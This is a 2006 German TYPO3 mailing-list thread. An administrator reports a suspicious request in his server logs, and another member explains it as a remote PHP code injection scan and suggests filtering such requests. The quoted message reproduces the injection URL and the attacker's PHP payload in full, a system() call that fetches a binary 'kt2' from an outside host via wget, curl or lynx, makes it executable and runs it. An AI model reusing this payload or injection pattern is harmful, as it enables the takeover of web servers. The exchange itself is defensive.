[TYPO3-german] Komische Anfrage an mein Typo3

Stefan Precht sprecht at symplasson.de
Thu Aug 31 23:04:46 CEST 2006


Hi!

Verschiedene Scann-Verfahren die auch für Pen-Tests genutzt werden 
laufen eben so ab. Es wird hier versucht über einen URL Aufruf PHP Code 
bei Dir einzuschleusen...

Wird bei dem Parameter L wohl nicht sehr weit kommen, aber wenn Du in 
Deinen Logs siehst, dass derartige Anfragen derzeit in verschiedenen 
Kombinationen auftauchen, scannt irgendwer Dein System. Sperr die 
Referref oder Filter alle Anfragen die ein republika im Aufruf haben...

Viele Grüße,
Stefan

Christian Leicht wrote:
> Hallo
> 
> ich habe gerade meine Logfiles einer T3 installation durchgeschaut und 
> folgenes gefunden:
> 
> index.php?id=34&L=http://abuser.republika.pl/test
> 
> Versucht da jemand meine Seite zu knacken? Wenn ich dem Link nachgehe 
> kommt dieses php Script zum Vorschein:
> 
> <?
> 
> echo 'm4k4bra - mamy cie';
> 
> system('cd /var/tmp;wget http://abuser.republika.pl/kt2; if [ ! -e ./kt2 
> ]; then curl http://abuser.republika.pl/kt2 > kt2;fi;if [ ! -e ./kt2 
> ];then lynx -dump http://abuser.republika.pl/kt2 >kt2; fi; chmod 777 
> kt2; ./kt2&');
> 
> ?>
> 
> Christian



More information about the TYPO3-german mailing list